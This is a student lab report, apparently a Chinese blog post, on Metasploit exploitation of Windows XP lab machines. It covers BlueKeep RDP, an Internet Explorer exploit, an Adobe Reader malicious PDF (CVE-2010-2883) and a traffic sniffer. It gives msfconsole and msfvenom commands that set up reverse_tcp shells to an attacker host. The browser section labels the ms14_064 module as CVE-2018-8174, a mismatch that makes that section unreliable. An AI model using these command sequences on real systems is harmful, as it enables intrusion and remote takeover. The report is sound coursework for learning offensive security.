20212408 2023-2024-2 《网络与系统攻防技术》实验六实验报告

20212408 2023-2024-2 《网络与系统攻防技术》实验六实验报告

一、实验内容

在进行本实验之前,学习了Metasploit的相关内容,包括发展过程,基本框架,基本指令等内容。
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 1.1一个主动攻击实践,尽量使用最新的类似漏洞;
  • 1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
  • 1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
  • 1.4 成功应用任何一个辅助模块。

二、实验准备

开始在msf控制台使用指令去查询漏洞,但是很多搜索的与Windows有关的漏洞,

search cve:2022
search cve:cve-2019-0708

去利用时,可能是对原理不够熟悉,都不知道如何正确使用,总是报错,
目标主机配置不和预期
图片表明目标主机配置不符合预期,需要使用WindowsXP等等系统。

于是选择在网上搜索相关的漏洞复现的资源,但是很多网络博客使用的都是Windows2007或者WindowsXP,于是我也选择重新安装一台WindowsXP的主机进行实验。
WindowsXP虚拟机下载配置教程

三、实验过程

3.1一个主动攻击实践,尽量使用最新的类似漏洞

3.1.1实验说明
  • 主动攻击实践cve-2019-0708
  • 攻击机:Kali(192.168.47.164)
  • 靶机:WindowsXP(192.168.233.138)
  • 漏洞介绍:

Windows系列服务器于2019年5月15号, 被爆出高危漏洞, 该漏洞影响范围较广, windows 2003、windows 2008、windows 2008R 2、windowsxp等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389, RDP协议进行攻击的。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互, 直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。这个漏洞是今年来说危害严重性最大的漏洞,换句话说,该漏洞是“可传播的”,这意味着任何利用该漏洞的恶意软件都可能从受影响的计算机传播到受影响的计算机,就像2017年Wanna Cry恶意软件在全球蔓延一样, 跟勒索,永恒之蓝病毒差不多。

3.1.2开始攻击

在msf控制台输入对应命令,查看有关该漏洞的模块信息。

search cve:cve-2019-0708

在这里插入图片描述
前两个模块,一个是扫描功能,一个是攻击功能。
使用攻击功能,也就是第二个模块:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

然后查看是否3389端口是否打开,使用指令:netstat -an(查看打开的端口):
请添加图片描述
如果发现3389端口没有打开,那么右键此电脑打开远程服务即可。
然后关闭防火墙,在kali虚拟机中查看是否开启3389端口。
使用指令:nmap 192.168.47.165,使用nmap扫描主机,查看端口是否开放。
请添加图片描述
发现端口已经打开,可以成功的扫描到,于是启动msf,输入:msfconsole
然后搜索漏洞,可以查到cve-2019-0708漏洞。

然后查看这个漏洞的配置:
请添加图片描述
然后对这些配置进行修改,将其修改为我自己的ip信息。
请添加图片描述
然后输入:show targets,显示可以选择的靶机的架构
在这里插入图片描述
选择适合的target,然后run。
然后发现被攻击的靶机出现蓝屏
在这里插入图片描述
然后这是kali中可以得到目标主机的shell,这时完成漏洞复现。
在这里插入图片描述
使用指令:

search cve:cve-2019-0708
set RHOST 192.168.47.165
set LHOST 192.168.47.164
set LPORT 2408
show options
show targets
run

3.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞

3.2.1 实验说明
  • 浏览器攻击实践:使用漏洞CVE-2018-8174
  • 攻击机kali:192.168.47.164
  • 靶机WindowsXP:192.168.47.165
    漏洞说明:

CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码,该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。在基于Web的攻击情形中,攻击者能通过Internet Explorer利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。

3.2.2 开始攻击

首先对浏览器进行配置,将需要的设置进行修改,设置靶机中IE浏览器的安全权限:右键“IE”→“属性”→“安全”→“自定义级别”→启用“对标记为可安全执行脚本的ActiveX控件执行脚本”;“高级”→勾选“允许运行或安装软件,即使签名无效”。
请添加图片描述
请添加图片描述
进入msfconsole进行参数配置(RHOSTS和payload),后开始攻击,能够获得靶机的shell。
这个漏洞需要先生成一个shellcode进行注入python文件中,
请添加图片描述

 use exploit/windows/browser/ms14_064_ole_code_execution # 选择攻击使用模块
 set SRVHOST 192.168.207.139 # 设置攻击机ip
 set AllowPowerShellPrompt true # msf中的exp代码只对安装powershell的系统生效 
 set LHOST 192.168.207.139
 set LPORT 2408
 exploit #发起渗透攻击

请添加图片描述
请添加图片描述
exploit后将生成网址,在靶机中用浏览器打开该网址,将获取到靶机的shell。
请添加图片描述
在WindowsXP下打开生成的链接:
请添加图片描述

 sessions # 列出会话
 sessions -i 1 # 进入与靶机的连接,即获取到的shell

请添加图片描述
可以发现有WindowsXP的session请添加图片描述
然后使用sysinfo可以查看被攻击的系统的具体情况,即WindowsXP。
请添加图片描述
输入shell可以看到被攻击后反弹的shell指令符。

3.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞

3.3.1 实验说明

CVE-2018-4878
攻击机:kali(192.168.207.139)
靶机:winXP(192.168.207.141)+ IE 8 + flashplayer_activex_28.0.0.137(Adobe Flash Player 28.0.0.137及其之前的版本)

漏洞介绍:

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

实验工具及简便代码

3.3.2 开始攻击

将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面,使用msfvenom生成shell代码
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.207.139 lport=2408 -f python>shellcode.txt
请添加图片描述
查看代码文件

root@kali:~# cat shellcode.txt
进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

将上面msfvenom生成的代码覆盖掉原来的代码:
请添加图片描述
修改CVE-2018-4878.py下面的文件信息
Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py 
root@kali:~/Desktop/CVE-2018-4878-master# ls -l 

但是一直提示代码存在问题,我不会改提供的python代码,于是实现这个漏洞的想法只能搁浅了。

于是我选择使用另外的漏洞进行实验。
CVE-2010-2883
实验环境
攻击机:kali(192.168.207.139)
靶机:winXP(192.168.207.141)+ Adobe Reader 9.3(版本在8.2.4-9.3.4之间即可)

漏洞原理:

漏洞名称:Adobe Reader TTF 字体 SING 表栈溢出漏洞
漏洞编号:CVE-2010-2883
漏洞类型:缓冲区溢出
漏洞描述:Adobe Reader 是流行的PDF阅读软件。CVE-2010-2883 Adobe Reader TTF 字体 SING 表栈溢出漏洞的成因是Adobe Reader和 Acrobat 9.3.4中的 CoolType.dll 在解析 PDF 中的字体时未检查数据的长度,导致缓冲区溢出。

使用windows/fileformat/adobe_cooltype_sing模块并配置参数,生成攻击所需的PDF文件“20212408zsj.pdf”。(载荷使用windows/meterpreter/reverse_tcp即可,反向连接到渗透机,无需修改)
请添加图片描述

 search adobe 
 use windows/fileformat/adobe_cooltype_sing 
 show options
 set FILENAME 20212408zsj.pdf
 set LPORT 2408
 exploit 

 [*] Creating '20212408zsj' file...

请添加图片描述
然后对配置进行修改:
在攻击机中开启监听。
请添加图片描述
在kali的路径/root/.msf4/local/中找到PDF文件,通过共享文件夹将其传给靶机。
请添加图片描述
在靶机中用Adobe Reader打开PDF文件,Adobe Reader将进入一种“卡壳”状态,此时攻击机获取到靶机的shell。
请添加图片描述
请添加图片描述

3.4成功应用任何一个辅助模块

sniffer(嗅探)可以使用这个功能来看靶机的浏览记录

search sniff  //看一下嗅探的攻击
use auxiliary/sniffer/psnuffle  //选择攻击操作
show options
exploit

请添加图片描述
这里并不需要进行配置,因为是对所有都进行网络嗅探,只要进行浏览器使用,都会被嗅探。
请添加图片描述

四、问题与解决方法

问题一、kali虚拟机无法联网,查看时只有127.0.0.1一个ip

解决方法:
在网上查询原因,网卡未启用:可能网络接口(如以太网卡)未启用。可以尝试使用ifconfig -a命令查看所有接口,包括未启用的接口。使用该命令后发现确实有一个网口没有打开,但这个ip是0.0.0.0,在网上查看,虽然可能无法联网,但是可以进行ip配置,

sudo ifconfig eth0 <IP地址> netmask <子网掩码>

使用这个代码就可以对网卡分配ip。

问题二、在复现CVE-2010-2883漏洞是Adobe reader无法被漏洞攻破

解决方法:
这个漏洞的针对性非常强,它只能针对Adobe reader9这一版本的阅读器,即使换一个版本也是无法被攻击,这里需要注意下载的版本,如果下错会比较麻烦。
Adobe reader9下载链接

五、思想感悟

在进行实验六的过程中,我深刻体会到了网络攻击与防御的技术原理和实践操作。通过实验,我了解到了如何利用最新的漏洞进行主动攻击,以及如何针对浏览器和客户端应用进行攻击。在攻击过程中,我学会了使用辅助模块来增强攻击效果。
在实验准备阶段,我遇到了一些问题,比如Kali虚拟机无法联网的情况。通过查找解决方法,我最终成功解决了这个问题,并顺利进行了后续的实验操作。通过这次实验,我深刻体会到了网络安全的重要性。在互联网时代,网络攻击呈现出多样化、隐蔽化的特点,我们必须时刻保持警惕,加强网络安全意识。同时,作为安全从业者,我们也要不断学习新的攻击技术和防御方法,保护网络安全,将继续努力学习,提升自己在网络安全领域的能力。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值